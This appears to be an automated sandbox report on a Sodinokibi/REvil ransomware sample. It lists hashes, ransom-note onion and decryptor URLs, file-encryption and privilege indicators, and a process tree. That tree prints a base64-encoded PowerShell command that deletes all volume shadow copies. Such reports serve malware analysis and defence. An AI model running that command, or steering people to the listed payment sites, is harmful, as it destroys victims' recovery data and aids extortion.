Analysis
-
max time kernel
83s -
max time network
94s -
platform
windows7_x64 -
resource
win7 -
submitted
25-08-2020 12:17
Static task
static1
Behavioral task
behavioral1
Sample
55.exe
Resource
win7
Behavioral task
behavioral2
Sample
55.exe
Resource
win10v200722
General
-
Target
55.exe
-
Size
289KB
-
MD5
500286eaf9eb11b34eb413bb0df5543b
-
SHA1
b889ff1138b2bd7a3033ca4c4868189dc8588f9b
-
SHA256
f67d2bb9157ba5ccacbe051ac737812226fb2b43fe209867ae276695a8a929a4
-
SHA512
65ce297688900f0c7b1eb3a327771eff79e366290761613b364f463787f66a46d14127e1a644b5fb8f26befdf90ce100110cf47107b9457f971ca8056402782a
Malware Config
Extracted
C:\mg6590u252-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/C3DAA270FDF09AE8
http://decryptor.cc/C3DAA270FDF09AE8
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Modifies extensions of user files 13 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
55.exedescription ioc process File renamed C:\Users\Admin\Pictures\ExportDisconnect.tif => \??\c:\users\admin\pictures\ExportDisconnect.tif.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\StopExport.crw => \??\c:\users\admin\pictures\StopExport.crw.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\UndoUnprotect.tiff => \??\c:\users\admin\pictures\UndoUnprotect.tiff.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\UnblockFind.png => \??\c:\users\admin\pictures\UnblockFind.png.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\RepairEdit.tif => \??\c:\users\admin\pictures\RepairEdit.tif.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\RequestResize.png => \??\c:\users\admin\pictures\RequestResize.png.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\SelectRestore.tif => \??\c:\users\admin\pictures\SelectRestore.tif.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\SkipClose.tif => \??\c:\users\admin\pictures\SkipClose.tif.mg6590u252 55.exe File renamed C:\Users\Admin\Pictures\ImportComplete.png => \??\c:\users\admin\pictures\ImportComplete.png.mg6590u252 55.exe File opened for modification \??\c:\users\admin\pictures\StepRead.tiff 55.exe File renamed C:\Users\Admin\Pictures\PublishRestore.crw => \??\c:\users\admin\pictures\PublishRestore.crw.mg6590u252 55.exe File opened for modification \??\c:\users\admin\pictures\UndoUnprotect.tiff 55.exe File renamed C:\Users\Admin\Pictures\StepRead.tiff => \??\c:\users\admin\pictures\StepRead.tiff.mg6590u252 55.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
55.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\6wb0n.bmp" 55.exe -
Drops file in Program Files directory 22 IoCs
Processes:
55.exedescription ioc process File opened for modification \??\c:\program files\CompareFind.wmx 55.exe File opened for modification \??\c:\program files\DisconnectPing.txt 55.exe File opened for modification \??\c:\program files\EnterResize.bmp 55.exe File opened for modification \??\c:\program files\MoveRedo.wmx 55.exe File opened for modification \??\c:\program files\ResetShow.dotm 55.exe File opened for modification \??\c:\program files\ResumeDeny.TTS 55.exe File opened for modification \??\c:\program files\SelectClear.dxf 55.exe File opened for modification \??\c:\program files\UnprotectOut.vstm 55.exe File created \??\c:\program files (x86)\mg6590u252-readme.txt 55.exe File opened for modification \??\c:\program files\AssertUnlock.ADTS 55.exe File created \??\c:\program files\microsoft sql server compact edition\mg6590u252-readme.txt 55.exe File opened for modification \??\c:\program files\PushSelect.tiff 55.exe File opened for modification \??\c:\program files\SaveStart.clr 55.exe File opened for modification \??\c:\program files\TestMerge.eprtx 55.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\mg6590u252-readme.txt 55.exe File created \??\c:\program files\mg6590u252-readme.txt 55.exe File opened for modification \??\c:\program files\UnpublishGroup.sql 55.exe File opened for modification \??\c:\program files\WaitShow.ram 55.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\mg6590u252-readme.txt 55.exe File opened for modification \??\c:\program files\GrantPush.avi 55.exe File opened for modification \??\c:\program files\ShowRemove.gif 55.exe File opened for modification \??\c:\program files\StartPublish.potm 55.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
55.exepowershell.exepid process 1464 55.exe 1016 powershell.exe 1016 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
55.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1464 55.exe Token: SeDebugPrivilege 1016 powershell.exe Token: SeBackupPrivilege 1916 vssvc.exe Token: SeRestorePrivilege 1916 vssvc.exe Token: SeAuditPrivilege 1916 vssvc.exe Token: SeTakeOwnershipPrivilege 1464 55.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
55.exedescription pid process target process PID 1464 wrote to memory of 1016 1464 55.exe powershell.exe PID 1464 wrote to memory of 1016 1464 55.exe powershell.exe PID 1464 wrote to memory of 1016 1464 55.exe powershell.exe PID 1464 wrote to memory of 1016 1464 55.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\55.exe"C:\Users\Admin\AppData\Local\Temp\55.exe"1⤵
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1464 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:1044
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1916